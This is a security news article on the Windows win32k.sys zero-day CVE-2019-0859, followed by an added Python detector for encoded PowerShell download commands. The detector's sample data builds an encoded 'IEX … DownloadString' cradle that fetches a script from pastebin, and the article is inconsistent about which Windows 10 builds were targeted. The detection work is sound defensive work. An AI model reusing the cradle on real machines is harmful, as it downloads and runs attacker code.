CVE-2019-0859 is a zero-day vulnerability that was patched as part of this month's Patch Tuesday. The vulnerability was detected by Kaspersky Lab researchers, who have just released a detailed technical summary of the issue.
In March 2019, Kaspersky’s Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to the discovery of a zero-day flaw located in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows discovered by the same team in the past several months, the researchers said.
CVE-2019-0859 Technical Details
In short, CVE-2019-0859 is a use-after-free flaw located in the system function that handles dialog windows and their additional styles. The exploit pattern the researchers came across in the wild targeted 64-bit versions of the operating system, ranging from Windows 7 to the latest builds of Windows 10. Note that exploitation of the vulnerability allows the malware to download and execute a script written by the attackers. The worst-case scenario of this exploit is an attacker gaining full control of the infected system.
In detail, upon execution CreateWindowEx sends the message WM_NCCREATE to the window when it is first created, the researchers explained. By using the SetWindowsHookEx function, it is possible to set a custom callback that handles the WM_NCCREATE message right before the window procedure is called.
Furthermore, the bug is related to Function ID:
In win32k.sys all windows are represented by the tagWND structure, which has an "fnid" field, also known as the Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others.
The exploit the researchers discovered in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10). The flaw was exploited with the help of the well-known HMValidateHandle technique, which is used to bypass ASLR.
After successful exploitation, PowerShell was executed with a Base64-encoded command. The sole purpose of the command was to download a second-stage script from https://pastebin.com. The second-stage PowerShell script then executed the final, third stage, which was also a PowerShell script.
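As an added example, not taken from the Kaspersky write-up, here is a small Python detector that applies the post-exploitation pattern just described (PowerShell launched with a Base64-encoded command that fetches a second stage from pastebin.com) to process-creation command lines. The sample command lines, the helper names and the pastebin URL path are constructed for illustration.

```python
import base64
import re

# PowerShell's -EncodedCommand switch (and common abbreviations) followed by the
# base64 token; PowerShell encodes the command text as UTF-16LE before base64.
ENC_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b", re.I)
PASTE_RE = re.compile(r"pastebin\.com", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline):
    """Flag the pattern from the write-up: PowerShell launched with an encoded
    command whose decoded text contains a download cradle or pastebin.com."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + (decoded or "")
    f = {
        "powershell": "powershell" in cmdline.lower(),
        "encoded_command": decoded is not None,
        "download_cradle": bool(CRADLE_RE.search(text)),
        "pastebin": bool(PASTE_RE.search(text)),
        "decoded": decoded,
    }
    f["alert"] = f["powershell"] and f["encoded_command"] and (f["download_cradle"] or f["pastebin"])
    return f

def scan(lines):
    """Return (index, findings) for every command line that raises an alert."""
    results = [(i, analyze_command_line(line)) for i, line in enumerate(lines)]
    return [(i, f) for i, f in results if f["alert"]]

def _encode(ps_text):
    # Builds the constructed sample the way PowerShell expects it (base64 of UTF-16LE).
    return base64.b64encode(ps_text.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation command lines (not real telemetry; the URL path is a placeholder).
SAMPLE_LINES = [
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"),
    "powershell.exe -Command Get-Service",
    "cmd.exe /c echo -enc notbase64!",
]
```

Feed `scan()` the command-line field of Sysmon Event ID 1 or Security Event ID 4688 records; only the first constructed line should raise an alert.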
Users should install the update addressing CVE-2019-0859 to avoid any exploitation.